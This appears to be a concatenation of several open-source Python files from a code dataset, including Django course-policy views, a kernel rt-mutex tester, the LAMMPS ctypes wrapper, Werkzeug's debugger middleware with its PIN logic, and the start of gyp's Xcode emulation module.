policy = Policy.objects.get(course=course)
except Policy.DoesNotExist:
policy = None
return render(request, 'teacher/policy/view.html',{
'course' : course,
'policy' : policy,
'user' : request.user,
'tab' : 'policy',
'HAS_ADVERTISMENT': settings.APPLICATION_HAS_ADVERTISMENT,
'local_css_urls' : settings.SB_ADMIN_2_CSS_LIBRARY_URLS,
'local_js_urls' : settings.SB_ADMIN_2_JS_LIBRARY_URLS,
})
@login_required(login_url='/landpage')
def policy_modal(request, course_id):
if request.method == u'POST':
form = PolicyForm()
return render(request, 'teacher/policy/modal.html',{'form' : form })
@login_required(login_url='/landpage')
def save_policy(request, course_id):
response_data = {'status' : 'failed', 'message' : 'unknown error with saving'}
if request.is_ajax():
if request.method == 'POST':
form = PolicyForm(request.POST, request.FILES)
if form.is_valid():
course = Course.objects.get(id=course_id)
form.instance.course = course
form.save()
response_data = {'status' : 'success', 'message' : 'saved'}
else:
response_data = {'status' : 'failed', 'message' : json.dumps(form.errors)}
return HttpResponse(json.dumps(response_data), content_type="application/json")
@login_required(login_url='/landpage')
def delete_policy(request, course_id):
response_data = {'status' : 'failed', 'message' : 'unknown error with deleting'}
if request.is_ajax():
if request.method == 'POST':
policy_id = int(request.POST['policy_id'])
teacher = Teacher.objects.get(user=request.user)
try:
policy = Policy.objects.get(policy_id=policy_id)
if policy.course.teacher == teacher:
policy.delete()
response_data = {'status' : 'success', 'message' : 'deleted'}
else:
response_data = {'status' : 'failed', 'message' : 'unauthorized deletion'}
except Policy.DoesNotExist:
response_data = {'status' : 'failed', 'message' : 'record does not exist'}
return HttpResponse(json.dumps(response_data), content_type="application/json")
| apache-2.0 |
k2wl/KernelEvolution | scripts/rt-tester/rt-tester.py | 11005 | 5307 | #!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <tglx@linutronix.de>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
| gpl-2.0 |
jluissandovalm/smd_lammps | python/lammps.py | 4 | 6759 | # ----------------------------------------------------------------------
# LAMMPS - Large-scale Atomic/Molecular Massively Parallel Simulator
# http://lammps.sandia.gov, Sandia National Laboratories
# Steve Plimpton, sjplimp@sandia.gov
#
# Copyright (2003) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
#
# See the README file in the top-level LAMMPS directory.
# -------------------------------------------------------------------------
# Python wrapper on LAMMPS library via ctypes
import sys,traceback,types
from ctypes import *
class lammps:
def __init__(self,name="",cmdargs=None,ptr=None):
# load liblammps.so by default
# if name = "g++", load liblammps_g++.so
try:
if not name: self.lib = CDLL("liblammps.so",RTLD_GLOBAL)
else: self.lib = CDLL("liblammps_%s.so" % name,RTLD_GLOBAL)
except:
type,value,tb = sys.exc_info()
traceback.print_exception(type,value,tb)
raise OSError,"Could not load LAMMPS dynamic library"
# if no ptr provided, create an instance of LAMMPS
# don't know how to pass an MPI communicator from PyPar
# no_mpi call lets LAMMPS use MPI_COMM_WORLD
# cargs = array of C strings from args
# if ptr, then are embedding Python in LAMMPS input script
# ptr is the desired instance of LAMMPS
# just convert it to ctypes ptr and store in self.lmp
if not ptr:
self.opened = 1
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
cargs = (c_char_p*narg)(*cmdargs)
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(narg,cargs,byref(self.lmp))
else:
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(0,None,byref(self.lmp))
# could use just this if LAMMPS lib interface supported it
# self.lmp = self.lib.lammps_open_no_mpi(0,None)
else:
self.opened = 0
# magic to convert ptr to ctypes ptr
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
self.lmp = c_void_p(pythonapi.PyCObject_AsVoidPtr(ptr))
def __del__(self):
if self.lmp and self.opened: self.lib.lammps_close(self.lmp)
def close(self):
if self.opened: self.lib.lammps_close(self.lmp)
self.lmp = None
def file(self,file):
self.lib.lammps_file(self.lmp,file)
def command(self,cmd):
self.lib.lammps_command(self.lmp,cmd)
def extract_global(self,name,type):
if type == 0:
self.lib.lammps_extract_global.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_double)
else: return None
ptr = self.lib.lammps_extract_global(self.lmp,name)
return ptr[0]
def extract_atom(self,name,type):
if type == 0:
self.lib.lammps_extract_atom.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_int))
elif type == 2:
self.lib.lammps_extract_atom.restype = POINTER(c_double)
elif type == 3:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_double))
else: return None
ptr = self.lib.lammps_extract_atom(self.lmp,name)
return ptr
def extract_compute(self,id,style,type):
if type == 0:
if style > 0: return None
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr[0]
if type == 1:
self.lib.lammps_extract_compute.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
if type == 2:
self.lib.lammps_extract_compute.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_compute(self.lmp,id,style,type)
return ptr
return None
# in case of global datum, free memory for 1 double via lammps_free()
# double was allocated by library interface function
def extract_fix(self,id,style,type,i=0,j=0):
if type == 0:
if style > 0: return None
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_fix.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
if type == 2:
self.lib.lammps_extract_fix.restype = POINTER(POINTER(c_double))
ptr = self.lib.lammps_extract_fix(self.lmp,id,style,type,i,j)
return ptr
return None
# free memory for 1 double or 1 vector of doubles via lammps_free()
# for vector, must copy nlocal returned values to local c_double vector
# memory was allocated by library interface function
def extract_variable(self,name,group,type):
if type == 0:
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
result = ptr[0]
self.lib.lammps_free(ptr)
return result
if type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_int)
nlocalptr = self.lib.lammps_extract_global(self.lmp,"nlocal")
nlocal = nlocalptr[0]
result = (c_double*nlocal)()
self.lib.lammps_extract_variable.restype = POINTER(c_double)
ptr = self.lib.lammps_extract_variable(self.lmp,name,group)
for i in xrange(nlocal): result[i] = ptr[i]
self.lib.lammps_free(ptr)
return result
return None
# set variable value
# value is converted to string
# returns 0 for success, -1 if failed
def set_variable(self,name,value):
return self.lib.lammps_set_variable(self.lmp,name,str(value))
# return total number of atoms in system
def get_natoms(self):
return self.lib.lammps_get_natoms(self.lmp)
# return vector of atom properties gathered across procs, ordered by atom ID
def gather_atoms(self,name,type,count):
natoms = self.lib.lammps_get_natoms(self.lmp)
if type == 0:
data = ((count*natoms)*c_int)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
elif type == 1:
data = ((count*natoms)*c_double)()
self.lib.lammps_gather_atoms(self.lmp,name,type,count,data)
else: return None
return data
# scatter vector of atom properties across procs, ordered by atom ID
# assume vector is of correct type and length, as created by gather_atoms()
def scatter_atoms(self,name,type,count,data):
self.lib.lammps_scatter_atoms(self.lmp,name,type,count,data)
| gpl-2.0 |
provaleks/o8 | addons/account_bank_statement_extensions/__init__.py | 442 | 1153 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_bank_statement
import res_partner_bank
import report
import wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
verdel/flexget-lostfilm-plugin | setup.py | 1 | 1285 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Parse the version from the lostfilm module.
with open('extras/__init__.py') as f:
for line in f:
if line.find("__version__") >= 0:
version = line.split("=")[1].strip()
version = version.strip('"')
version = version.strip("'")
continue
with open(path.join(here, 'README.md'), encoding='utf-8') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'HISTORY.rst'), encoding='utf-8') as history_file:
history = history_file.read().replace('.. :changelog:', '')
requirements = [
'FlexGet>2.2'
]
setup(
name='Lostfilm-Flexget',
version=version,
description='Lostfilm FlexGet plugin',
long_description=readme + '\n\n' + history,
author='Vadim Aleksandrov',
author_email='valeksandrov@me.com',
url='https://github.com/verdel/flexget-lostfilm-plugin',
packages=find_packages(),
install_requires=requirements,
keywords='lostfilm, lostfilm.tv, flexget, plugin',
license='MIT',
entry_points="""
[FlexGet.plugins]
lostfilmtv = extras.input.lostfilmtv""",
)
| mit |
burzillibus/RobHome | venv/lib/python2.7/site-packages/werkzeug/debug/__init__.py | 90 | 17266 | # -*- coding: utf-8 -*-
"""
werkzeug.debug
~~~~~~~~~~~~~~
WSGI application traceback debugger.
:copyright: (c) 2014 by the Werkzeug Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import uuid
import json
import time
import getpass
import hashlib
import mimetypes
from itertools import chain
from os.path import join, dirname, basename, isfile
from werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response
from werkzeug.http import parse_cookie
from werkzeug.debug.tbtools import get_current_traceback, render_console_html
from werkzeug.debug.console import Console
from werkzeug.security import gen_salt
from werkzeug._internal import _log
from werkzeug._compat import text_type
# DEPRECATED
#: import this here because it once was documented as being available
#: from this module. In case there are users left ...
from werkzeug.debug.repr import debug_repr # noqa
# A week
PIN_TIME = 60 * 60 * 24 * 7
def hash_pin(pin):
if isinstance(pin, text_type):
pin = pin.encode('utf-8', 'replace')
return hashlib.md5(pin + b'shittysalt').hexdigest()[:12]
_machine_id = None
def get_machine_id():
global _machine_id
rv = _machine_id
if rv is not None:
return rv
def _generate():
# Potential sources of secret information on linux. The machine-id
# is stable across boots, the boot id is not
for filename in '/etc/machine-id', '/proc/sys/kernel/random/boot_id':
try:
with open(filename, 'rb') as f:
return f.readline().strip()
except IOError:
continue
# On OS X we can use the computer's serial number assuming that
# ioreg exists and can spit out that information.
try:
# Also catch import errors: subprocess may not be available, e.g.
# Google App Engine
# See https://github.com/pallets/werkzeug/issues/925
from subprocess import Popen, PIPE
dump = Popen(['ioreg', '-c', 'IOPlatformExpertDevice', '-d', '2'],
stdout=PIPE).communicate()[0]
match = re.search(b'"serial-number" = <([^>]+)', dump)
if match is not None:
return match.group(1)
except (OSError, ImportError):
pass
# On Windows we can use winreg to get the machine guid
wr = None
try:
import winreg as wr
except ImportError:
try:
import _winreg as wr
except ImportError:
pass
if wr is not None:
try:
with wr.OpenKey(wr.HKEY_LOCAL_MACHINE,
'SOFTWARE\\Microsoft\\Cryptography', 0,
wr.KEY_READ | wr.KEY_WOW64_64KEY) as rk:
return wr.QueryValueEx(rk, 'MachineGuid')[0]
except WindowsError:
pass
_machine_id = rv = _generate()
return rv
class _ConsoleFrame(object):
"""Helper class so that we can reuse the frame console code for the
standalone console.
"""
def __init__(self, namespace):
self.console = Console(namespace)
self.id = 0
def get_pin_and_cookie_name(app):
"""Given an application object this returns a semi-stable 9 digit pin
code and a random key. The hope is that this is stable between
restarts to not make debugging particularly frustrating. If the pin
was forcefully disabled this returns `None`.
Second item in the resulting tuple is the cookie name for remembering.
"""
pin = os.environ.get('WERKZEUG_DEBUG_PIN')
rv = None
num = None
# Pin was explicitly disabled
if pin == 'off':
return None, None
# Pin was provided explicitly
if pin is not None and pin.replace('-', '').isdigit():
# If there are separators in the pin, return it directly
if '-' in pin:
rv = pin
else:
num = pin
modname = getattr(app, '__module__',
getattr(app.__class__, '__module__'))
try:
# `getpass.getuser()` imports the `pwd` module,
# which does not exist in the Google App Engine sandbox.
username = getpass.getuser()
except ImportError:
username = None
mod = sys.modules.get(modname)
# This information only exists to make the cookie unique on the
# computer, not as a security feature.
probably_public_bits = [
username,
modname,
getattr(app, '__name__', getattr(app.__class__, '__name__')),
getattr(mod, '__file__', None),
]
# This information is here to make it harder for an attacker to
# guess the cookie name. They are unlikely to be contained anywhere
# within the unauthenticated debug page.
private_bits = [
str(uuid.getnode()),
get_machine_id(),
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, text_type):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
return rv, cookie_name
class DebuggedApplication(object):
"""Enables debugging support for a given application::
from werkzeug.debug import DebuggedApplication
from myapp import app
app = DebuggedApplication(app, evalex=True)
The `evalex` keyword argument allows evaluating expressions in a
traceback's frame context.
.. versionadded:: 0.9
The `lodgeit_url` parameter was deprecated.
:param app: the WSGI application to run debugged.
:param evalex: enable exception evaluation feature (interactive
debugging). This requires a non-forking server.
:param request_key: The key that points to the request object in ths
environment. This parameter is ignored in current
versions.
:param console_path: the URL for a general purpose console.
:param console_init_func: the function that is executed before starting
the general purpose console. The return value
is used as initial namespace.
:param show_hidden_frames: by default hidden traceback frames are skipped.
You can show them by setting this parameter
to `True`.
:param pin_security: can be used to disable the pin based security system.
:param pin_logging: enables the logging of the pin system.
"""
def __init__(self, app, evalex=False, request_key='werkzeug.request',
console_path='/console', console_init_func=None,
show_hidden_frames=False, lodgeit_url=None,
pin_security=True, pin_logging=True):
if lodgeit_url is not None:
from warnings import warn
warn(DeprecationWarning('Werkzeug now pastes into gists.'))
if not console_init_func:
console_init_func = None
self.app = app
self.evalex = evalex
self.frames = {}
self.tracebacks = {}
self.request_key = request_key
self.console_path = console_path
self.console_init_func = console_init_func
self.show_hidden_frames = show_hidden_frames
self.secret = gen_salt(20)
self._failed_pin_auth = 0
self.pin_logging = pin_logging
if pin_security:
# Print out the pin for the debugger on standard out.
if os.environ.get('WERKZEUG_RUN_MAIN') == 'true' and \
pin_logging:
_log('warning', ' * Debugger is active!')
if self.pin is None:
_log('warning', ' * Debugger PIN disabled. '
'DEBUGGER UNSECURED!')
else:
_log('info', ' * Debugger PIN: %s' % self.pin)
else:
self.pin = None
def _get_pin(self):
if not hasattr(self, '_pin'):
self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)
return self._pin
def _set_pin(self, value):
self._pin = value
pin = property(_get_pin, _set_pin)
del _get_pin, _set_pin
@property
def pin_cookie_name(self):
"""The name of the pin cookie."""
if not hasattr(self, '_pin_cookie'):
self._pin, self._pin_cookie = get_pin_and_cookie_name(self.app)
return self._pin_cookie
def debug_application(self, environ, start_response):
"""Run the application and conserve the traceback frames."""
app_iter = None
try:
app_iter = self.app(environ, start_response)
for item in app_iter:
yield item
if hasattr(app_iter, 'close'):
app_iter.close()
except Exception:
if hasattr(app_iter, 'close'):
app_iter.close()
traceback = get_current_traceback(
skip=1, show_hidden_frames=self.show_hidden_frames,
ignore_system_exceptions=True)
for frame in traceback.frames:
self.frames[frame.id] = frame
self.tracebacks[traceback.id] = traceback
try:
start_response('500 INTERNAL SERVER ERROR', [
('Content-Type', 'text/html; charset=utf-8'),
# Disable Chrome's XSS protection, the debug
# output can cause false-positives.
('X-XSS-Protection', '0'),
])
except Exception:
# if we end up here there has been output but an error
# occurred. in that situation we can do nothing fancy any
# more, better log something into the error log and fall
# back gracefully.
environ['wsgi.errors'].write(
'Debugging middleware caught exception in streamed '
'response at a point where response headers were already '
'sent.\n')
else:
is_trusted = bool(self.check_pin_trust(environ))
yield traceback.render_full(evalex=self.evalex,
evalex_trusted=is_trusted,
secret=self.secret) \
.encode('utf-8', 'replace')
traceback.log(environ['wsgi.errors'])
def execute_command(self, request, command, frame):
"""Execute a command in a console."""
return Response(frame.console.eval(command), mimetype='text/html')
def display_console(self, request):
"""Display a standalone shell."""
if 0 not in self.frames:
if self.console_init_func is None:
ns = {}
else:
ns = dict(self.console_init_func())
ns.setdefault('app', self.app)
self.frames[0] = _ConsoleFrame(ns)
is_trusted = bool(self.check_pin_trust(request.environ))
return Response(render_console_html(secret=self.secret,
evalex_trusted=is_trusted),
mimetype='text/html')
def paste_traceback(self, request, traceback):
"""Paste the traceback and return a JSON response."""
rv = traceback.paste()
return Response(json.dumps(rv), mimetype='application/json')
def get_resource(self, request, filename):
"""Return a static resource from the shared folder."""
filename = join(dirname(__file__), 'shared', basename(filename))
if isfile(filename):
mimetype = mimetypes.guess_type(filename)[0] \
or 'application/octet-stream'
f = open(filename, 'rb')
try:
return Response(f.read(), mimetype=mimetype)
finally:
f.close()
return Response('Not Found', status=404)
def check_pin_trust(self, environ):
"""Checks if the request passed the pin test. This returns `True` if the
request is trusted on a pin/cookie basis and returns `False` if not.
Additionally if the cookie's stored pin hash is wrong it will return
`None` so that appropriate action can be taken.
"""
if self.pin is None:
return True
val = parse_cookie(environ).get(self.pin_cookie_name)
if not val or '|' not in val:
return False
ts, pin_hash = val.split('|', 1)
if not ts.isdigit():
return False
if pin_hash != hash_pin(self.pin):
return None
return (time.time() - PIN_TIME) < int(ts)
def _fail_pin_auth(self):
time.sleep(self._failed_pin_auth > 5 and 5.0 or 0.5)
self._failed_pin_auth += 1
def pin_auth(self, request):
"""Authenticates with the pin."""
exhausted = False
auth = False
trust = self.check_pin_trust(request.environ)
# If the trust return value is `None` it means that the cookie is
# set but the stored pin hash value is bad. This means that the
# pin was changed. In this case we count a bad auth and unset the
# cookie. This way it becomes harder to guess the cookie name
# instead of the pin as we still count up failures.
bad_cookie = False
if trust is None:
self._fail_pin_auth()
bad_cookie = True
# If we're trusted, we're authenticated.
elif trust:
auth = True
# If we failed too many times, then we're locked out.
elif self._failed_pin_auth > 10:
exhausted = True
# Otherwise go through pin based authentication
else:
entered_pin = request.args.get('pin')
if entered_pin.strip().replace('-', '') == \
self.pin.replace('-', ''):
self._failed_pin_auth = 0
auth = True
else:
self._fail_pin_auth()
rv = Response(json.dumps({
'auth': auth,
'exhausted': exhausted,
}), mimetype='application/json')
if auth:
rv.set_cookie(self.pin_cookie_name, '%s|%s' % (
int(time.time()),
hash_pin(self.pin)
), httponly=True)
elif bad_cookie:
rv.delete_cookie(self.pin_cookie_name)
return rv
def log_pin_request(self):
"""Log the pin if needed."""
if self.pin_logging and self.pin is not None:
_log('info', ' * To enable the debugger you need to '
'enter the security pin:')
_log('info', ' * Debugger pin code: %s' % self.pin)
return Response('')
def __call__(self, environ, start_response):
"""Dispatch the requests."""
# important: don't ever access a function here that reads the incoming
# form data! Otherwise the application won't have access to that data
# any more!
request = Request(environ)
response = self.debug_application
if request.args.get('__debugger__') == 'yes':
cmd = request.args.get('cmd')
arg = request.args.get('f')
secret = request.args.get('s')
traceback = self.tracebacks.get(request.args.get('tb', type=int))
frame = self.frames.get(request.args.get('frm', type=int))
if cmd == 'resource' and arg:
response = self.get_resource(request, arg)
elif cmd == 'paste' and traceback is not None and \
secret == self.secret:
response = self.paste_traceback(request, traceback)
elif cmd == 'pinauth' and secret == self.secret:
response = self.pin_auth(request)
elif cmd == 'printpin' and secret == self.secret:
response = self.log_pin_request()
elif self.evalex and cmd is not None and frame is not None \
and self.secret == secret and \
self.check_pin_trust(environ):
response = self.execute_command(request, cmd, frame)
elif self.evalex and self.console_path is not None and \
request.path == self.console_path:
response = self.display_console(request)
return response(environ, start_response)
| mit |
wacrea/DBStatusREST-nodejs | node_modules/npm/node_modules/node-gyp/gyp/pylib/gyp/xcode_emulation.py | 13 | 52358 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This module contains classes that help to emulate xcodebuild behavior on top of
other build systems, such as make and ninja.
"""
import copy
import gyp.common
import os.path
import re
import shlex
import subprocess
import sys
from gyp.common import GypError
class XcodeSettings(object):
"""A class that understands the gyp 'xcode_settings' object."""
# Populated lazily by _SdkPath(). Shared by all XcodeSettings, so cached
# at class-level for efficiency.
_sdk_path_cache = {}
# Populated lazily by GetExtraPlistItems(). Shared by all XcodeSettings, so
# cached at class-level for efficiency.
_plist_cache = {}
# Populated lazily by GetIOSPostbuilds. Shared by all XcodeSettings, so
# cached at class-level for efficiency.
_codesigning_key_cache = {}
def __init__(self, spec):
self.spec = spec
self.isIOS = False
# Per-target 'xcode_settings' are pushed down into configs earlier by gyp.
# This means self.xcode_settings[config] always contains all settings
# for that config -- the per-target settings as well. Settings that are
# the same for all configs are implicitly per-target settings.
self.xcode_settings = {}
configs = spec['configurations']
for configname, config in configs.iteritems():
self.xcode_settings[configname] = config.get('xcode_settings', {})
self._ConvertConditionalKeys(configname)
if self.xcode_settings[configname].get('IPHONEOS_DEPLOYMENT_TARGET',
None):
self.isIOS = True
# This is only non-None temporarily during the execution of some methods.
self.configname = None
# Used by _AdjustLibrary to match .a and .dylib entries in libraries.
self.library_re = re.compile(r'^lib([^/]+)\.(a|dylib)$')
def _ConvertConditionalKeys(self, configname):
"""Converts or warns on conditional keys. Xcode supports conditional keys,
such as CODE_SIGN_IDENTITY[sdk=iphoneos*]. This is a partial implementation
with some keys converted while the rest force a warning."""
settings = self.xcode_settings[configname]
conditional_keys = [key for key in settings if key.endswith(']')]
for key in conditional_keys:
# If you need more, speak up at http://crbug.com/122592
if key.endswith("[sdk=iphoneos*]"):
if configname.endswith("iphoneos"):
new_key = key.split("[")[0]
settings[new_key] = settings[key]
else:
print 'Warning: Conditional keys not implemented, ignoring:', \
' '.join(conditional_keys)
del settings[key]
def _Settings(self):
assert self.configname
return self.xcode_settings[self.configname]
def _Test(self, test_key, cond_key, default):
return self._Settings().get(test_key, default) == cond_key
def _Appendf(self, lst, test_key, format_str, default=None):
if test_key in self._Settings():
lst.append(format_str % str(self._Settings()[test_key]))
elif default:
lst.append(format_str % str(default))
def _WarnUnimplemented(self, test_key):
if test_key in self._Settings():
print 'Warning: Ignoring not yet implemented key "%s".' % test_key
def _IsBundle(self):
return int(self.spec.get('mac_bundle', 0)) != 0
def GetFrameworkVersion(self):
"""Returns the framework version of the current target. Only valid for
bundles."""
assert self._IsBundle()
return self.GetPerTargetSetting('FRAMEWORK_VERSION', default='A')
def GetWrapperExtension(self):
"""Returns the bundle extension (.app, .framework, .plugin, etc). Only
valid for bundles."""
assert self._IsBundle()
if self.spec['type'] in ('loadable_module', 'shared_library'):
default_wrapper_extension = {
'loadable_module': 'bundle',
'shared_library': 'framework',
}[self.spec['type']]
wrapper_extension = self.GetPerTargetSetting(
'WRAPPER_EXTENSION', default=default_wrapper_extension)
return '.' + self.spec.get('product_extension', wrapper_extension)
elif self.spec['type'] == 'executable':
return '.' + self.spec.get('product_extension', 'app')
else:
assert False, "Don't know extension for '%s', target '%s'" % (
self.spec['type'], self.spec['target_name'])
def GetProductName(self):
"""Returns PRODUCT_NAME."""
return self.spec.get('product_name', self.spec['target_name'])
def GetFullProductName(self):
"""Returns FULL_PRODUCT_NAME."""
if self._IsBundle():
return self.GetWrapperName()
else:
return self._GetStandaloneBinaryPath()
def GetWrapperName(self):
"""Returns the directory name of the bundle represented by this target.
Only valid for bundles."""
assert self._IsBundle()
return self.GetProductName() + self.GetWrapperExtension()
def GetBundleContentsFolderPath(self):
"""Returns the qualified path to the bundle's contents folder. E.g.
Chromium.app/Contents or Foo.bundle/Versions/A. Only valid for bundles."""
if self.isIOS:
return self.GetWrapperName()
assert self._IsBundle()
if self.spec['type'] == 'shared_library':
return os.path.join(
self.GetWrapperName(), 'Versions', self.GetFrameworkVersion())
else:
# loadable_modules have a 'Contents' folder like executables.
return os.path.join(self.GetWrapperName(), 'Contents')
def GetBundleResourceFolder(self):
"""Returns the qualified path to the bundle's resource folder. E.g.
Chromium.app/Contents/Resources. Only valid for bundles."""
assert self._IsBundle()
if self.isIOS:
return self.GetBundleContentsFolderPath()
return os.path.join(self.GetBundleContentsFolderPath(), 'Resources')
def GetBundlePlistPath(self):
"""Returns the qualified path to the bundle's plist file. E.g.
Chromium.app/Contents/Info.plist. Only valid for bundles."""
assert self._IsBundle()
if self.spec['type'] in ('executable', 'loadable_module'):
return os.path.join(self.GetBundleContentsFolderPath(), 'Info.plist')
else:
return os.path.join(self.GetBundleContentsFolderPath(),
'Resources', 'Info.plist')
def GetProductType(self):
"""Returns the PRODUCT_TYPE of this target."""
if self._IsBundle():
return {
'executable': 'com.apple.product-type.application',
'loadable_module': 'com.apple.product-type.bundle',
'shared_library': 'com.apple.product-type.framework',
}[self.spec['type']]
else:
return {
'executable': 'com.apple.product-type.tool',
'loadable_module': 'com.apple.product-type.library.dynamic',
'shared_library': 'com.apple.product-type.library.dynamic',
'static_library': 'com.apple.product-type.library.static',
}[self.spec['type']]
def GetMachOType(self):
"""Returns the MACH_O_TYPE of this target."""
# Weird, but matches Xcode.
if not self._IsBundle() and self.spec['type'] == 'executable':
return ''
return {
'executable': 'mh_execute',
'static_library': 'staticlib',
